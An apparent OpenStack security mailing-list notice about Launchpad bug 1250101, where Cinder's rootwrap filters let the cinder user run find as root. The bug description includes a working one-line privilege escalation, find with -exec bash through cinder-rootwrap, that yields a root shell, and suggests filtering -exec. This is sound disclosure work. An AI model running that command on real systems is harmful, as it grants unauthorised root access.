[Openstack-security] [Bug 1250101] Re: Cinder's rootwrap filters allow to run find as root, which allows arbitrary commands

Jeremy Stanley fungi at yuggoth.org
Tue Nov 12 18:06:57 UTC 2013 

I too agree, so switched it to public with no associated advisory.

** Changed in: ossa
       Status: Incomplete => Invalid

** Information type changed from Private Security to Public

** Tags added: security

-- 
You received this bug notification because you are a member of OpenStack
Security Group, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1250101

Title:
  Cinder's rootwrap filters allow to run find as root, which allows
  arbitrary commands

Status in Cinder:
  New
Status in Oslo - a Library of Common OpenStack Code:
  Invalid
Status in OpenStack Security Advisories:
  Invalid

Bug description:
  The patch
  https://github.com/openstack/cinder/commit/688c515b9d662486395d36c303ca599376a1dc0d
  added the find command to etc/cinder/rootwrap.d/volume.filters. This
  introduces a security hole as the find command is able to call exec,
  and so the cinder user can run any command as root. For example:

  vagrant at controller:~$ sudo -u cinder bash
  cinder at controller:~$ id
  uid=109(cinder) gid=115(cinder) groups=115(cinder)

  cinder at controller:~$ sudo /usr/bin/cinder-rootwrap
  /etc/cinder/rootwrap.conf find /etc/hosts -exec bash \;

  root at controller:~# id
  uid=0(root) gid=0(root) groups=0(root)

  
  I guess the way to fix this is to add a FindFilter to Oslo that rejects calls to find with the -exec or -execdir argument.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1250101/+subscriptions

More information about the Openstack-security mailing list